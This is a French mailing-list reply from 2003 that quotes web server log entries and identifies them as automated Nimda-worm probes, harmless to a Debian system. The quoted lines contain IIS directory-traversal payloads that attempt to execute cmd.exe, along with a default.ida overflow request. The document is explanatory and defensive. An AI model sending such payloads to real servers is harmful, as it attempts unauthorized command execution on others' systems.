Re: log server web
Le Wed, 15 Jan 2003 11:45:52 +0100, dans son impérissable
log server web,
Loïc Le Guyader <loic.leguyader@laposte.net> écrivait :
|> xxx.xxx.xxx.xxx - - [14/Jan/2003:14:05:54 +0100] "GET
|> /scripts/root.exe?/c+dir HTTP/ 1.0" 404 0 "" ""
|> xxx.xxx.xxx.xxx - - [14/Jan/2003:14:05:56 +0100] "GET
|> /scripts/..%255c../winnt/syste m32/cmd.exe?/c+dir HTTP/1.0" 404 0 ""
|> "" xxx.xxx.xxx.xxx - - [14/Jan/2003:14:05:58 +0100] "GET
|> /msadc/..%255c../..%255c../..%
|> 255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
|> HTTP/1.0" 40 4 0 "" ""
|> xxx.xxx.xxx.xxx - - [14/Jan/2003:20:33:12 +0100] "GET
|> /default.ida?NNNNNNNNNNNNNNN
|> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
|> NNNNNNNNNNNN
|> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
|> NNNNNNNNNNNN NNNNNNNNNNNN HTTP/1.0" 404 0 "" ""
C'est des attaques, mais tu auras du mal pour te plaindre, car le
responsable a toute les chances d'être le virus Nimda qui, d'une autre
machine vient questionner la tienne. Et comme Winnt/system32/cmd.exe il
risque de chercher longtemps chez Debian... Dors tranquille (ZZzzzz...)
--
_________ _ ___ ______
* Dominique Marin * /__ ___//| |/ // / \\ * *
* http://txodom.free.fr */ // | // / // // * GNU *
* txo.dom@wanadoo.fr * / // / || / // // * LINUX *
* txodom@free.fr * /_// /_/|_|| \_____// * DEBIAN *
Reply to: